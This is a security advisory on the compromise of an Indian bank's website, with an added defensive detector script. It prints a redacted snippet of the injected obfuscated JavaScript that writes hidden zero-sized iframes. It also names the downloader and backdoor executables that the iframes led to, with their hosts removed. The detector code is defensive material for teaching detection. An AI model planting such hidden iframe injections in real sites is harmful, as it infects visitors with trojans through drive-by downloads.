Websense® Security Labs™ has discovered that the official site for Indian Syndicate Bank (www.syndicatebank.in)
was compromised with a malicious script that attempts to exploit
multiple vulnerabilities. When customers visit the web site, a
malicious JavaScript file (e.js) is executed and creates two additional
iframes in the page.

<script src=http://< URL REMOVED >/e.js></script>

Snippet of js code:

document.writeln("\/\/xxxx mca By Mr.0wen\/\/");
document.writeln("document.write(unescape(\"%3CIFraMe < URL REMOVED >IFraMe < URL REMOVED >wIdth%3D%220%22%20heIght%3D%220%22%20FraMebOrder %3D%220%22%3E%3C\/IFraMe%3E\"));");
document.writeln("\/\/xxxx mca By Mr.0wen\/\/");

The JavaScript from e.js (seen above) creates two new IFRAME elements
within the page. One IFRAME attempts to load exploit code and the other
creates several additional IFRAMEs that contain advertisement-related
content. The exploit will try to load a Trojan Downloader (qq.exe)
which will contact a remote server to download the following Trojan
Downloader and Backdoor:

http://< URL REMOVED >/hxw/hx/200512.exe
http://< URL REMOVED >/hxw/hx/dd.exe

The site appears to have been cleaned a few hours ago.
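The e.js snippet hides its IFRAME tags inside a percent-encoded string passed to unescape(), with mixed-case tag and attribute names, so a plain search for "<iframe" in the served file finds nothing. The following is an added example, not code from the original advisory: a static check that decodes each unescape() argument and reports zero-sized iframes. The sample input is constructed, example.invalid is a placeholder host, and the function names are this example's own.

```javascript
// Added example: static detection of the injection pattern described above.
// SAMPLE_E_JS is constructed; example.invalid is a placeholder host.
const SAMPLE_E_JS =
  'document.writeln("document.write(unescape(\\"%3CIFraMe%20src%3D%22' +
  'http%3A%2F%2Fexample.invalid%2Fa.htm%22%20wIdth%3D%220%22%20heIght%3D' +
  '%220%22%20FraMebOrder%3D%220%22%3E%3C\\/IFraMe%3E\\"));");';

const MAX_DEPTH = 4; // bound recursion through nested encoded layers

// Read one attribute value from a tag, ignoring case and optional quotes.
function attr(tag, name) {
  const m = new RegExp("\\s" + name + "\\s*=\\s*[\"']?([^\"'\\s>]+)", "i").exec(tag);
  return m ? m[1] : null;
}

// True when the attribute is present and evaluates to zero ("0", "0px").
function isZero(value) {
  return value !== null && parseInt(value, 10) === 0;
}

// Collect zero-sized iframes in `text`, then decode every unescape("...")
// argument and scan the result, since the tag only exists after decoding.
function findHiddenIframes(text, depth = 0, found = []) {
  // Undo JS string escaping (\" and \/) left by the outer document.writeln.
  const src = text.replace(/\\(["'\/\\])/g, "$1");
  for (const [tag] of src.matchAll(/<iframe\b[^>]*>/gi)) {
    const width = attr(tag, "width"), height = attr(tag, "height");
    if (isZero(width) || isZero(height)) {
      found.push({ src: attr(tag, "src"), width, height, depth });
    }
  }
  if (depth < MAX_DEPTH) {
    for (const m of src.matchAll(/unescape\(\s*(["'])([\s\S]*?)\1\s*\)/gi)) {
      findHiddenIframes(unescape(m[2]), depth + 1, found);
    }
  }
  return found;
}

console.log(findHiddenIframes(SAMPLE_E_JS));
```

The depth field records how many encoding layers were peeled before the tag appeared; a hit at depth 1 or more on a page you operate is worth comparing against the last known-good copy of the file.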

 